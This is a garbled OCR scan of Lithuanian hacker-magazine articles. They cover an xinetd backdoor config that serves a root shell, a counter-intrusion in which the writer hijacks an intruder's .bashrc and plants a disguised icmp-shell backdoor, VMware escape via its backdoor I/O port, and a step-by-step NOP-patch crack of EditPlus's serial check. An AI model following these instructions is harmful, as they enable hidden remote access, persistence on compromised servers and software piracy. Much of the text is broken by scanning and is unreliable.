>td aptarnaujami servisai 
Pavyzdžiui, /etc/xineta.d/ftp byloje saugomas konfigas, api 
ftpd paleidimo parametrus. 


ar te) 


išsaugomi kataloge /etc 


ersija. Jo užduotis 
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I analizuoti superserverio atsto! 


ant, čia ne 


> prie ko prisiknisti 


ivo Mėnesio senumo (nors jas buvo galimė 
aip tariant, menkai tikė 


is nuotoliniam priėj 


[ da touch). Kit r 
omanda touch). Ki a 


ent xinetd. Tai reiškia, jog reikės šiek tiek pakeisti paie 


Hakeriško konfigo pavyzdys 
service IIC 
7 po tūktinio žodžio service eina seiviso pavadinimas 
I 
part = IK 
+ kokio soniso jungiį naudoti 
socket type = streom 
+ soketo tipas 
wait = 10 
+ loukiam? —nel 
user = (00t 
+ vartotojas — serverio savininkas 
server = /us/local/bir/hosh 
2 bylos, kuri veikia kaip serveris, pavadinimas, 
būtų „Ain/sh“ 
server ag = i 
2 programai perduodami argumentai 
disable = no 
) 


žiūrėk į /oty/sarvicos 


— universalus variantus 


pos mus „binysi 


Štai kaip įsilaužėliai per xinetd patenka į sistemą. Taip pat 
galima paleisti paprasto vartotojo vardu veikiantį bekdorą 
Tam reikia visą konfigą sudėti į kokią nors bylą, paslėpti ją 
kuo toliau, o po to vartotojo vardu įvykdyti: 

$ 'which xinetd' f /path/to/file/backdoor.conf 


Po to bekdoras bus paleistas. Argumentas -f parodo, kokią 
konfigūracinę bylą naudoti paleidimo metu. Vienintelis dalykas, 
kurį Čia reikėtų prisiminti — paprastam vartotojui neprieinamos. 
žemiau 1024 esančios jungtys, tačiau jam to ir nereikia. 


iImui naudojo 


[Trojanu užkrėstas trojanas| Niekan 
versijų [4 ir 5) shv rootk 
daugybe žmonių. Dėl to api 


tai, kad roolkite yra slap 


duomenis čiantis kodas, dabar žino beveik visi. Pabandy 
atidžiau peržiūrėti šio rootkito sh ripte i o už jo 
įdiegimą į sistemą tup. Atidaręs jį su bel kokiu tekstų redai 
toriumi po kelių peržiūros dienų (arba įvedę tinai 
urasi štai tol 
Nematai nieko įtartino? Kintamieji 51 
metu tavo nurodytas žodis ir jungti 1 ( 
aiškinti, iš kur paimamas kintama MNIPADDF | 
u Smd5sum viskas kur kas įdomiau. Šiaip jau Jei 
kam lygus $md5sum, tai rasi Uk manipuliavim 
darbo su kontrolinėmis sumomis įrankis) pro al 
gale kintamajam priskiriama Jedės pašto r 
md5sum=11 nux)yahoo.com 
Būtent jam ir išsiunčiama inf 
zalima rasti da J je, ta 
Ne d). Vis dėlto mus dai 
i kai šis rootkitas perduodamas i 
AC kuriuo išsiunčiamas priėjimo prie mė 
nuolat kelčiasi, Kiekvic 10) rašyt 1 
kad || kiel 4 dieną spaminių Su priejirr 
ulaužtų sistemų :). Kieno tik pašto ad 
Ir kodėl gi aš tau visa sakau? od 1 
bent p; tiniškai išsiudijuot i i 
pakliuvusius dalykėlius. Deja, apgauti la 
irt kurį tu jau seniai paži Jel t IČiuli 
bet tikrink! :) 
[Totalus patikrinimas| 
bylas, Ieškoti I | 
jog S oje įdiegt j i 
fesionalaus ( 
stratoriui labai page 
itokia sistemose besivė 
Micialios svetain par i 
isas įdiegimo procesas ap: ) 
rkhunter'io kataloge. Norėda 1 
Isos sistemos saugu į [ 
Nė nemirktelėjęs rkhunter pa 
aprašymą apie einamą tyrimo ot 1 I 
vykdomų bylų kontrolinės suma: tu 
perėjo prie atskirų rootkitų p ių tikr 
išspjovė perspėjimą (warning), atseit, aj i 
SHV5, išsamesnės informa: | 


Ką daryti, jeigu IRC tinklas užbanino mano 


us o E (O) potinklį? 


= 
z - 
] 
eniejia Linija Konfigūracinėje byloje aš suradau Cisco slaptažodį, 
Ė tačiau jis pateiktas kažkokiu nesuprantamu for- 
matu. Kaip ji būtų galima dešifruoti? 


ĮGinkluotas medžiotojas] 
Rootkithunter — iš tiesų kietas įrankis su dideliu galimybių 
rinkiniu, be to, jis parašytas vien skriptine kalba! Kaip sakoma 
gamintojo svetainėje (www.rootkit.nl/about), programa su- 
derinama su visomis UNIX tipo operacinėmis sistemomis ir ji 
nėra priklausoma nuo įdiegtos PĮ. Taigi, kaip tu jau tikriausiai 
supratai, pagrindinė rkhunter'io užduotis yra patikrinti tavo 
sistemą, ar joje nėra įvairiausių rootkitų ir bekdorų. Programa 
tikrina vykdomų programų teises, ieško įtartinų modulių 
(LKM) ir sulygina sisteminių programų kontrolines sumas. Ji 
sėkmingai aptinka Knark, Suckit, SHV4(5), FreeBSD Rootkit ir 
daugelį kitų kenksmingų programų. Kaip pareiškia programos 
autorius, roctkithunter gali su 99,994 tikimybe nustatyti, ar 
mašina užkrėsta. Mano nuomone, tai labai naudingas įrankis, 
kurį turėtų turėti kiekvienas administratorius. Yra dar viena 
analogiško tipo programa — chkrootkit, kuri savo veikimo 
principu labai panaši į rkhunter. Rekomenduočiau šį įrankį 
išbandyti savo serveriuose — O jeigu pas tave nepastebimai 
įsibrovė koks nors hakeris, kuris dabar tonomis iš tavo serverio 
siunčiasi warezą? 
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lokaliai skenuojant jungtis, tačiau tai truktų keliskart ilgiau). Kaip 
portcheck gali matyti net ir tai, ko neparodo netstat? Viskas labai 
paprasta: kuomet tu paleisdamas šį įrankį nurodai diapazoną, 
pradedamas ciklo vykdymas, kuriame su /0::Socket kiekvienoje 
Jungtyje sukuriamas soketas. Savaime suprantama, jeigu jungtį 
Jau naudoja kokia nors programa (web servers, ftp, bekdoras), 
tai soketo sukurti nepavyks. Būtent tai ir leidžia mums manyti, 
kad jungtis jau atvira ir naudojama. Mąstom toliau Jungų 
žinom, vadinasi, pats metas paleisti koki nors kietą sniferį. Čia 
pasirinkimas tiesiog milžiniškas, užeik adresu http://packet- 
stormsecurity.nl/sniffers ir pats tuo įsitikink. Nusnifinta medžiaga 
bus gana neblogas įkaltis prieš hakerį :). 


[Hakerio demaskavimas| Taigi mašina užkrėsta rootkitu SHV5.. 
Hakerio namų katalogas yra čia: /usr/lib/libsh. Tiesą pasakius. 
nieko ypatingo, tačiau jame yra viena nuostabi byla — „bashrc. 
Būtent ji man ir padės. Mokykloje istorijos pamokose tau tikri- 
ausiai pasakojo. kad paleidus interpretatorių apdorojama ir 
įvykdoma visa šiame skripte saugoma bjaurastis. Kadangi aš 
turėjau root teises, galėjau į šią bylą laisvai rašyti viską, ka tik 
norėjau. Iš pradžių nusprendžiau sužinoti įžūliojo įsilaužėlio IP 
adresa ir išsiųsti jį sau elektroniniu paštu: 


* ul bashyc 

mail "jonuksce) bi gov" 
info = set | grep SSH CUJENT“ 
echo Sinko | mail Smail 


Jeigu tu gerai išmanai shell programavimą Ir tau nestinga 
vaizduotės, čia gali prikresti daug smagių eibiu. Pavyzdžiui, 
aš čia įterpiau kodo fragmentą, kuris į mano pašto dežutę 
atsiunčia hakerio IP adresą (bus galima pasiimti kompiuterio 
logus Ir pasijuokti iš hakerio |ūzerio). Po to aš susimasčiau, 
ar negalima būtų padaryti taip, Jog vos įėjęs į sistemą mano 
konkurentas būtų atjungtas, t.y. terminalas būtų užmušamas 


Z.O5bw Is -1a 
208 


druxr-xr-x 2 500 500 4096 Apr 6 2003 
druxr-x-x | 3 500 500 4095 Sep 14 19:41 
pud 


Ed /usr/Mb/libeh 
Is -1a 


total 56 


Š root root 
82 root Foot 
Žroot | root 
1122 114 
Žract || root 
Zroot | root 
i 122 14 
3 500 500 
cat /1ib/lidpsi.so 

ttyload 

snėni rs 

sp 

shsb 

hide 

burin 

žynecan 

mirkfarce 

Etymon 

shŽ-pouer 
15 -1a /etc/sh.conf 
1 root | root 35 Nov 11 2003 /etc/ 
id 


uid=D(raot) 
bash-2.05ba 
bash-2,05bH 


gid=D(raot) gruupe=I(raot) 
Detstat a Igrep 


siauželio guolyje, 


devintuoju signalu (kill -9). Pasirausęs savo kompiuteryje. 
suradau kažkada mano paties kurtą shell skripta: 


los pid in ps [grop basi [auk "4 print S) 
do 


adho „Spid“ 
kili 9 Sid“ 
dine 


Atrodytų viskas, galiu nusiraminti: įsilauželis sistemoje 
neišdarinės nesąmonių ir nedefeisins svetainių, tuo pačiu 
išduodamas mūsų buvimą mašinoje. Tiesa, liko dar vienas 
fImtas neužbaigtas reikalas. Kaip tų jau tikriausiai supratai, 
aš visiškai atvirai buvau prisijungęs per ssh root vardu. 
Šią situaciją reikėjo iš esmės pakeisti, todėl aš taip pat 
nusprendžiau mašinoje įdiegti bekdorą, bet nė su kokiu nors 
ten rootkitu, 0 pakankamai originaliu būdu — su icmp-shel! 
lapie šį nuostabų įrankį gali paskaityti iškarpoje). Ji parsisiųsti 
galima iš čia: http://peterhost.dl.sourceforge.net/saurceforge) 
icmpshell/ish -vO.2.tar.gz, Išpakavęs archyva, aš padariau 
make linux ir gavau dvi vykdomas bylas: ishd (demonas) Ir 
ish iklientas). Serverinę dalį aš sudėjau į /bin. tada aplinkos 
kintamąjį PATH pakeičiau einamu katalogu, ishd pervadinau 
į mysgąld ir paleidau su parametrais pagal nutylėjimą. Šiaip 
Jau taip elgtis nerekomenduotina, geriausia būtų šį bekdorą 
naudoti kartu su adore, — juk tuomet padidėja Likimybe, kad 
tavęs neaptiks piktasis tinklo administratorius. Norėdamas 
neskausmingai gauti priėjimą prie šios mašinos, aš pas 
save FreeBSD sistemoje sukompiliavau icmp-shell klientą. 
Atrodytų, lyg ir viskas bekdoras tvarkingai veikia, 0 tai 
reiškia, jog dabar aš savo rankose turiu puikią tolimesniam 
destruktyvui tinkamą platformą :) 
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Pabėgimas iš „VM Ware“ 
Prasiskverbimas iš virtualios 

mašinos į pagrindinę sistemą 
DAUGELIS HAKERIŲ IR SISTEMŲ 
ADMINISTRATORIŲ ABEJOTINAS PRO 
GRAMAS LEIDŽIA SU VM WARE IR KITAIS 
EMULIATORIAIS, TAIP MANYDAMI, KAD JIE 
PATIKIMAI APSAUGOTI, TAČIAU TAIP NĖRA! 
KENKSMINGASIS KODAS GALI IŠTRŪKTI IŠ 
EMULIATORIAUS IR PATEKTI Į PAGRINDINĘ 
SISTEMĄ. KRISAS KASPERSKIS IŠSAMIAI 
IŠTYRĖ ŠĮ KLAUSIMĄ IR SIŪLO KELETĄ 
EFEKTYVIŲ GALIMŲ ATAKŲ SCENARIJŲ. 


[Taip darė tavo senelis] MS-DOS/Ox laikais e 
ą kompiuterių 
is buvo ypač 


sperimen. 


tams su 


vo ant stalo turėti kel 


ąjį disk 


irusais tekc 


arba nginėl 


u ki 


nepatog Jta ilgesingai žiūrėjo į NT pusę. kurios lanksti 
saugumo jo daryti stebuklus, pavyzdžiui, leido 
procesui Keisti ecialiai pakištas bylas-drozofilas. Deja! 

o moje neveikė! Be to, saugumo 


anti ypatingai nepatikima, todėl 
moko ją apeiti (pavyzdžiui, emuliuoti įvedimą 


SC 


iš pelės/klaviatūros, siunčiant komandas labiau privi 


legijuotam langui). Pasirodžius virtualioms mašinoms (VM 
Ware, Virtual PC), atsirado ir pagunda jas panaudoti kaip 

aptvarą“ virusams ir kirminams tai labai patogu. Vi- 
etoje terlionių su monitoriais, koi is, kietaisiais diskais 


pa Ššimtis „ BMINIŲ 
iai, pavyzdžiui, BOCHS 
'imo įrankius, užtikrintai veikiančius 


mūsų hakeriškame urve 
kai kurie emuliat 
turi įmontuotus deri 


ten, kur jau nebesusitvarko soft-ice ir olly 
[Mano namai — kalėjimas] Viskas klausimas tame, kiek 
tai patikima. Laikyti gyvą kirminą emuliatoriuje? O jeigu jis 
taiga Iš jo iš! ? Laukinėje gamtoje pagautų kirminų 
analizė parodė, kad daugelis iš jų užtikrintai atpažįsta 


emuliatoriaus dėl ko 


kirminas turi p 


vimą ir atsisako jame pasileist 
ias galimybes prasmukti nepastebėtas, 
Šška mintis vietoje nestovi ir bando ištrūkti 
inos sienų. Teoriškai tai įmanoma. Emulia 
ypač dinaminiai, t.y. tokie, kurie dalį komandų vykdo 
soriuje) neapsaugoti nuo klaidų. Er 
ana patikimai perima privilegijuotas komandas 


aip kre mo/išvedimo jungtis) 


Vis delto hake 


išvirtualios m. 


toriai 


pimasis į įve: 
okių į 


instrukcijas egzistuoja reali įrašymo 


ausiai nėra deninių akmenų 


ykdant 
proceso-emilia 
modifikuojamas n 
= šių duomenų bus bent viena rodyklė 


„įprastas 
riaus adresų erdvę grėsmė. Žinoma. 
kodas, o duomenys, tačiau jeigu tarp 


o taip tikrai bus 


2. Vienintelė prob- 
lema tame, kad tokia 
užkimšta greičiau, nei spė 
emuliatoriai Ž 
hipote 
todikomis, kurios veikia praktiši 


Kurios € 


ai sumažina kirmino sėk 


nes skyles ir susikoncentr 


ir e) įsisk fo Aptarsir 5 
mechanizi 

[Virtualus tinklas] Praktiškai visi emnuliatoriai ( 
inklą, kuris nematomu kabeliu susieja vieš [ 
pagrindine (host) sistemas. OEMU tipo emuliator 

mas iš karto, o VM Ware k atitinkamai sukor 

mašiną, tačiau paprastai emuliatorius konfig 

kadar pals patogiausias bi ikeist 


pačiu VM Ware galima lengvai sukurti honeypot'ą, sa 
tiems virusams ir kirmir 
Jeigu pagrindinė oper a prieinama per tinklą ir 
skylių (DCOM RPC arba TCPIPSYS tipo), tuomet ją galir 
atakuoti iš emuliatoriaus lygiai taip pat, kaip ir tikrame tinkle, Č 


X 1. Vel Joms Virti Ž 
VA a ; 
pradedant nuo Windows to 
stilių, kurį valdo folder.htt by T al 3 
kuris škina“ ne tik Jį I: 
VBS virusų, kurie dauginasi 2 k 
kenksmingas emuliatoriuje vykdo Josavą folder 
htt bylą arba įsiskverbs į jau egzist | ji 2 
atalogo atidarym su Explorer £ [- [2 J 
htt byloje saugomas skriptas Idymą ir savo vald 
irusą! Ir tai ne vienintelis kelias! Virusas ali sukurti deskti 
ir nurodyti, kad katalogas naudo) paveiksle ( 


tuomet jį atidarius Explorer automatiškai 


paveikslelius. Žinomos mažiausiai trys fatali 


kurios suteikia galimybę perduoti 
omą mašininį kodą. Ir nors atitinka: atai 


bylose saL 


jau senokai, daugelis mašinų lieka pažeidžia 


šiandien, Apsisaugoti nuo tokio tipo atakų labai paprasta; spjai 


i Explor FAR arba Total Commai 


r ir naudokis t 


patikrindamas padalintus katalogus, ar juose viska i 

tu pats niekada nesinaudoji Explorer T 3 
nesinaudoja ir kiti, todėl egzistuoja tikimybė, kad pad. 
atsidarys kas nors kitas 

ĮBackdoor] Virtualios mašinc [2 [ 1 


naudoja specialų (ir paprasčiausiai ne Jotą 


mechanizmą, kuris panašus į naudojama )3h Rai 
Brauno Interrupt List'e). Virtual PC šiam ukslui J 
(invalid) procesoriaus instrukcija d Fh 3Fh ( 3 
VM Ware magišką“ įvedimo/išvedi kBsišto! 
tumas tik tame, kad daugelis asmeninių ugniasienių nese VM Ware, kadangi tai populiariausias € tor Jor 
prisijungimų Irjų nedraudžia, Ly. emuliatorius haKeriui Ieic Juoti backdoor komandą, reikia atlikt eiksiT 
ngti prie tų resursų, kurie iš Išorės patikimai uždaryti! Kuriant + į FAX registrą perkelti magišką skaičių 56405863 
eypot'us tai labai aktualu! Tarkim, pagrindinėje sistemoje yra vaizdavime tai būtu VMXI 
ntų (shared) resursų, kurie prieinami tik lokaliame tinkle ir pa. į DX registrą perkelti magišką skaičių 5658 + 
jie neapsaugoti slaptažodžiais, tuomet virtuali mašina a VX 
1 „tiltu“ (arba gali ją pavadinti proxy serveriu) tarp tra Deriiaiti komandos numėn: « X 
r no ir pagrindinės sistemos! Kaip apsisaugoti nuo šios 
? Paprasčiausias sprendimas — panaikinti virtualų tinklą ivykdyti komanda IN EAX, DX (arba OUT DX, EAX 
sikeitinėti duomenimis su viešinčia sistema per diskelį/CD-ROM ieizu programa vykdoma rie su VM Ware (arba VM Ware prieštai 
[ siterliotum su CD-R/RW disku įrašymu, galima naudoti VirtU- puvo Užlopytas) taikomajame apsaugoto reži 
Neišgelbės! Tai reiškia >riėjimo pažeidimo“ tipo išir 
1 įdiegti šviežius pataisymų L aigų pre EBX registre bus mag 
6 ugoti visus padalintus (share skaičius ime tai būtų VMXI 
es pa, mašinoje uždrausti Visus SEIVISUS, | Ose kys luorė tokie yr 
priėjimas nepageidaujamas, arba įsitikinti, kad asmeninė y Ware pripažįsta daugybę pačių įvairia nd 
ienė stebi lokalius prisijungimus ir juos blokuoja išstudijavo ir savo straipsnyje VMware k (ht; 
chat.at.intoseek.co, ba aše Ker ( 
Lokalaus tinklo resursai („shared folders*)| VM Ware emuliato Čia galima rasti ir datos/laiko nustatymą, 2 af t 
teikia dar vieną apsikeitimo duomenimis būdą tarp virtualios pureriu, ir net nuotolinio proced , ect 2 
s ir pagrindinės operacinės sistemos — shared foldėrs tačiau potencialiai pavojingų komandų tarp jų nėra. Virusa: 
idalinti katalogai). Sukonfigūravus viešinčią mašiną, administra- tiesiog imti ir ištrūkti iš virtuali 1 Arba... vi | 
teikia priėjimą prie vieno arba kelių pagrindinės sistemos Daugiau nei dvi dešimtys komandu dar lie inėtos. N 


0 
» 


kas nežino, kokios galimybės mūsų laukia... Iš visų iki šiandienos 
išstudijuotų komandų pačia pavojingiausia buvo Ir lieka OCh 
(Connect/disconnect a device), kuri atsakinga už IDE, SCSI ir USB 
renginių prijungimą/atjungimą. Virusas turi prašmatnią galimybę 
prijungti fizinį pagrindinės sistemos diską ir jame kaip reikiant 
prišiukšlinti (/M Ware leidžia fizinių diskų pagrindu kurti virtualius 
diskus). Virusas taip pat gali prieiti ir prie USB bei užkrėsti jame 
saugomas vykdomas bylas, kurias po to būtinai kas nors paleis 
pagrindinėje mašinoje. Kitaip tariant, galimybių daug. Saugumo 
dėlei rekomenduojama užlopyti VM Ware, pakeičiant jo magiškąjį 
numerį į ką nors kita. Neoficialius pataisymas saugomas čia: 
http://honeynet.rstack.org/tools/ympatch.c, oficialių kol kas nėra, 
artimoje ateityje greičiausiai ir nebus. Tačiau net ir užlopyta sistema 
vis dar lieka pažeidžiama, kadangi parinkti reikiamą magišką skaičių 
galima ir brutforsinant, nes variantų nėra jau tiek daug — 16 bitų 
jungties numeris plius 32 bitų „pyragėlis“ reiškia mažiau nei 48 
aktualius bitus! „Mažiau“ dėl to, kad mes galime drąsiai atmesti 
standartinius jungčių numerius, kurių negalima naudoti. 

Kiti metodai 

Norint tarp virtualios mašinos ir pagrindinės sistemos apsikeisti 
mažais duomenų kiekiais, patogu naudotis diskeliu. Tiesiog suteiki- 
ame emuliatoriui fizinį priėjimą prie A: (B:) įrenginio, ir viskas! Jeigu 
virusas į boot sektorių įkels savo kodą, o diskelis liks pamirštas 
Įrenginyje ir šis įrenginys bus pirmas BIOS Setup nustatymuose 
nurodytas krovimosi įrenginys, kada nors kenksmingasis kodas gaus 
valdymą ir galės atakuoti kietąjį pagrindinės sistemos dis 
Yra ir kitų įsiskverbimo variantų, tačiau jie dar mažiau tikėtini, todėl 
čia nėra aptariami 


ą. 


[Kas toliau?] Emuliatorius — tai labai patogus daiktas, bet aš siūlyčiau 
susilaikyti nuo virusų veisimo virtualios mašinos gelmėse: viešinčią 
sistemą nuo realaus pasaulio skiriantis kiautas pernelyg plonas, o 
prieš protingai suplanuotą ataką neatsilaikysi. Be abejo, galima paleisti 
emuliatorių emuliatoriuje (pavyzdžiui, BOCHS VM Ware viduje), tačiau 
tai vis tiek neišspręs visų problemų, o našumas nukris kolosaliai! 

Atskiras kietasis diskas šiuo atveju kur kas patikimesnis sprendi 
mas. Ir patogesnis. Beje, tokiu atveju nėra būtina fiziškai (ištraukiant 


acionalinės virusų medžioklės ypatybės arba aptvaras virusams 
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kabelį) atjunginėti pagrindinės sistemos disko. Pagrindiniame BIOS 
skyriuje išvardinti diskai aktualūs tik pirminio krovimosi stadijoje, 
o toliau visas apsikeitimas duomenimis atliekamas per apsaugoto 
režimo tvarkyklę, kuri dirba tiesiogiai su valdikliu. Dažniausiai inte: 
gruoto valdiklio kanalų atjungimas per BIOS Setup diskus padaro 
nematomais, tuomet iki jų neprieisi net su standartinėmis Window 
priemonėmis, bet labai norint kenksmingas kodas gali veikimo 
metu perkonfigūruoti valdiklį ir prijungti visus kanalus. Savaime 
suprantama, tai nuo konkrečios sistemos priklausoma operacija, 
visi valdikliai programuo- 
jami skirtingai, tačiau 
palaikyti keletą labiausiai 
paplitusių mikroschemų 
visiškai realu! 

Kitaip tariant, „senoviniai“ 
metodai — patys patikimi- 
ausi, tačiau nepatogūs. 
Virtuali mašina — tai pa 
togu, tačiau nepatikima, 
Rinkis pats! 
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JEIGU KAS NORS TAU 
KADA NORS SAKĖ, KAD 
SHAREWARE PROGRA- 
MAS LAUŽIA TIK NUO 
GALVOS IKI KOJŲ ASEM- 
BLERIO DOKUMENT- 
ACIJOMIS APSIKROVĘ 
GURU, TAI PERSKAITĘS 
ŠĮ STRAIPSNĮ TU PA- 
KEISI SAVO NUOMONE. 
MES KARTU SU TAVI- 
MI PAMATYSIM, 
KAIP DERINTUVAS IR 
ŠEŠIOLIKTAINIS REDAK- 
TORIUS GALI PADARYTI 
TĄ PATĮ, KĄ PADARO 
TEISINGAI ĮVESTAS SER- 
UINIS NUMERIS. 


Programinis sugriovimas 
Programos „EditPlus“ bandomosios 
versijos („trial“) apsaugos apėjimas 


[Prieš startą] Su specializuotu tekstų redaktoriumi EditPlus labai 
patogu redaguoti pačius įvairiausius išeities tekstus: jis moka 
išryškinti su įvairiausiomis programavimo kalbomis (HTML, CSS, 
PHP ASP Perl, C/C++, Java) parašytas išraiškas ir žymes. Be 
to, šis redaktorius turi šio sąrašo praplėtimo galimybę, pridedant 
Kitoms kalboms skirtus įskiepius. Redagavimo metu labai padeda 
eilučių numeracija ir kitos puikios galimybės. Šios programos 
privalumus galima būtų vardinti iki begalybės, todėl būtų lengviau 
iš karto pereiti prie trūkumų, tiksliau, prie pagrindinio trūkumo 
— programa yra mokama. Užjūrio buržujai už programą prašo net 
30 amerikietiškų dolerių. Tačiau mes tokios sumos tam tikrai ne- 
skirsim, iš kur mes imtume tiek pinigų? :) Pabandysime programą 
užregistruoti savo jėgomis. 


ĮĮrankis] Pora žodžių apie tai, ko mums prireiks. Visų pirma, tai 
daugeliui programuotojų, hakerių, krekerių, vartotojų ir lamerių 
žinomas disasembleris ir derinimo įrankis OllyDbg. Greičiausiai 
daugeliui iškils klausimas: o kodėl ne Softlce? Paaiškinu: turint 
nedaug programų laužimo patirties (o šis straipsnis orientuotas 
būtent į pradedančiuosius), sudėtinga susigaudyti derintuve, 
kuris sukurtas labiau programavime patyrusiems, nei tame 
rekkale menkai nusimanantiems. Toliau mums prireiks bet kokio 
šešioliktainio redaktoriaus, pavyzdžiui, pagarsėjusio Hiew arba ne 
tokio patogaus WinHex. Aš pirmenybę teikiu pastarajam. 


[Sesele, skalpelį] Taigi pradėsime studijuoti programą. Iš pradžių 
programą suinstaliuosime, o paskui paleisime. Kaip bebūtų keista, 
prieš programos paleidimą pasirodo registravimo langas, kitaip 
dar vadinamas „nagas“. Nuspaudę mygtuką „Enter Registration 
Code“, mes pamatysime langą, kuriame bus du laukai: „Usemame“ 
ir „Regcode“. Pirmajame lauke registruojant įvedamas vartotojo 
vardas, o antrajame — pagal mums nežinomą algoritmą generuo- 
jamas registracinis numeris. Vis dėlto raktų generatoriaus rašymas 
įmūsų planus neįeina. 

Aš pasirinkau niekuo nesupakuotą programą. Kad paaiškintume 


šonais 
ponikios 


£258:95545256550 


taisome bylą 


principus, AsProtect'us paliksime visokiems guru, Aukščiau paminėti 
laukai — standartiniai WinAP! objektai (paprasčiausi TextBox'ai). 
Iš to išplaukia, kad juose įvestų eilučių skaitymui turi būti nau- 
dojama standartinė procedūra GetWindow'TextA. Šiaip jau tokiems 
patikrinimams būtų gerai naudoti kokį nors API šnipą (mano atveju 
M$SpyJ0), kuris ieškant lango man parodytų textbox'ų klasę. Paban- 
dykime šį faktą patikrinti praktiškai. Įdiegiam ir paleidžiam OllyDbg. 
Po to pasirenkam meniu „File —> Open“ (arba tiesiog spaudžiam 
F3) ir pasirodžiusiame lange įvedame bylą „EditPlus.exe“. Labai re- 
komenduoju iš anksto pasidaryti rezervinę pradinės bylos kopiją, kuri 
praverstų nenumatytiems atvejams. Jeigu bus parodyti kokie nors 
pranešimai, spaudžiam „Ok“. Palaukiam, kol derintuvas analizuoja 
bylą (galima priversti derintuvą atlikti analizę nuspaudus Ctrl+A). 
Paruošta: procesas užkrautas ir sustabdytas įėjimo taške. Dabar 
patikrinkime mūsų hipotezę apie tai, kad serijinis numeris ir varto- 
tojo vardas nuskaitomi su procedūra GetWindowTextA. Tam visoms 
tokioms procedūroms sukurkime sustojimo taškus (break-points, 
breaks — tai tokios vietos, kur programa laikinai sustabdo savo 
vykdymą ir kuriuos mes vadinsime breikais). Norint su OllyDbg sukurti 
breiką, reikia pasinaudoti CommandLine įskiepiu, kas daroma tiesiog 
nuspaudus klavišų kombinaciją Alt+F1. Tada pasirodys savotiškos 
komandinės eilutės langas, į kurį reikia įvesti bpx GetWindowTextA 
ir nuspausti Enter. Čia bpx — tai breiko sukūrimo komanda, su 
Softlce tai daroma analogiškai. Kadangi programoje yra keletas 
GetWindowTextA iškvietimų, tau bus pateiktas langas su šioje pro- 
gramoje iškviečiamų bibliotekinių funkcijų ir procedūrų sąrašu. Čia 
iškyla viena akivaizdi problema, kurios esmė tame, kad iškvietimų 
yra keletas, ir mes nežinome, kuris būtent mums yra reikalingas (su 
tokiu požiūriu visiems iškvietimams jau sukurtas sustojimo taškas 
— red.past.). Norėdami išspręsti šią problemą, griebsime jautį už 
ragų: sustojimo taškus sukursime visiems funkcijos iškvietimams, 
nuspaudę dešinį pelės klavišą ant vieno iš jų ir pasirinkę „Set break- 
point on every call to GetWindovTextA" arba tiesiog nuspaudę klavišą 
F2. Viskas, breikai sukurti. Spaudžiam FS ir taip paleidžiam procesą. 
Kadangi funkcijų daug, mums reikia surasti būtent tą, kuri atsako 
užduomenų nuskaitymą, tada spaudžiam F9, kol nepasirodys nago 
langas. Mūsų duomenis įvedame ten, kur reikia. Čia ir suveikia mūsų 
breikpointas. Derintuvas sustos prie GetWindowTextA iškvietimo. 
Toliau programą vykdysime pažingsniui, spaudinėdami F7 tol, kol 
neprieisim iki vietos, kurios adresas — 0047CA03. Čia programa 
neva „užsiciklina“, vėl ir vėl sugrįžta į kodo eilutę su nurodytu adresu. 
Tai ir yra serijinio numerio teisingumo patikrinimo procedūra. Kaip 
aštai sužinojau? Peržiūrėk dešinėje OlyDbg pusėje pateiktų registrų 
turinį. Ten pasirodė tie duomenys, kuriuos aš įvedinėjau registracijos 
metu. Palaukime, kol programa adrese 0047CA19 nustos vykdyti 
sąlyginį perėjimą į adresą 0047CA03. Spaudinėdami F7, priei- 
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Awwerackab. — Ia svetainė, 
Sukurta tų, Kuems įdomu, kas 
dedasi krekingo pasaulije, tų, 
Aurie domisi iš esmės naujų 
apsaugų aužimu, 

Forumas, vairios temos, aud 
gos programos Ir daug pačios 
palriausios Informacijos tiek 
patyrusiems, iek Ir naujokams 

tai tol gra nepilnas sąrašas 0, 
ką tu rasi, savo Mėgiamiausi 
naršyklės adreso eltėjė įvedęs 
rcracilaD 1. 


sime iki adreso 0047CB57. 
Kaip vėliau paaiškėja, čia yra 
sąlyginis perėjimas: ar įvestas 
serijinis numeris teisingas, 
ar ne (eilutė „JNZ SHORT 
EDITPLUS.0047CB60“). Mes 
dabar neaptarinėsime serijinio 
numerio generavimo algoritmo, 
mums tiesiog svarbu nulaužti 


M J 4 Viskas, kas parašyta šiame šią POESIMĄ: 
straipsnyje — anekuotas, 
Redakeija rstaipsnio amor [Atpratiname programą 
pop elisa šokinėti ten, kur nerei- 
"Ž bus areštuotas. kia] Tam, kad programa 


nepereidinėtų ten, kur ji nėra 

pageidaujama, reikia kažkaip 
pašalinti šį niekingą perėjimą. Tam perėjimo komandą pakeičiame 
serija operatorių. Operatorius NOP (Not OPerand) nieko nedaro. 
Norėdami pakeisti kodą, du kartus spragtelėkime pele ant eilutės 
su reikiamu sąlyginio perėjimo operatoriumi. Pasirodys langas, 
kur galima pataisyti programos kodą. Pažymėkime vėliavėlę „Fill 
with NOPs“ ir vietoje kodo eilutės su sąlyginiu perėjimu įveskime 
operatorių NOP Po to spaudžiam „Assemble“ ir uždarome langą. 
Spaudžiam F9 ir žiūrim, ką dabar pasakys mūsų tiriama programa. 
Valio, ji sako, jog tam, kad būtų priimtas serijinis numeris, ją rei- 
kia perleisti. Spaudžiam „Ok“ ir uždarome programą. Paleiskime 
Ją dar kartą. Be abejo, pasirodo pranešimas „Invalid registration 
code“. Viskas, ko mums reikia, — pašalinti šį pranešimą, nes 
kitaip jis mus su savo pasirodymais kiekvieną kartą paleidžiant 
programą užknis negyvai! Vėl paleiskime OllyDbg ir pasirinkime 
„File —> Attach“, po ko iš sąrašo pasirinkime mums reikalingą 
procesą (redaktorių „EditPlus“). Spaudžiam Run, po to — pauzę. 
Kam? Ogi tam, kad sužinoume, kokiu adresu įvyksta neteisingo 
registracijos kodo pranešimo iškvietimas. Šis adresas lygus 
004C8097 (langelio išvedimo funkcija vadinasi MesssageBoxA). 
Norėdami pašalinti pranešimo iškvietimą, mes vėl pasinaudosime 
NOP'ais. Kaip mums sužinoti, kiek NOP'ų reikia norint pakeisti 
kitos funkcijos iškvietimą? Iš po MessageBoxA iš karto einančios 
instrukcijos adreso (004C809D) atimame paties iškvietimo adresą 
(004C8097). Gauname 6. Kadangi NOP komanda atmintyje užima 
1 baitą, mums į šešioliktainės komandos NOP reikšmę reikia 
pakeisti 6 baitus, pradedant adresu 004C8097. NOP komandos 


vedame duomenis Ir nuspaudžiame mygtuką... 


reikšmė šešioliktainėje skaičiavimo sistemoje lygi 90, ką lengva 
sužinoti žvilgtelėjus į bet kurį Asemblerio kalbos vadovėlį. 


[Atliekame pakeitimą] Dabar imsimės ir paties pakeitimo. Man 
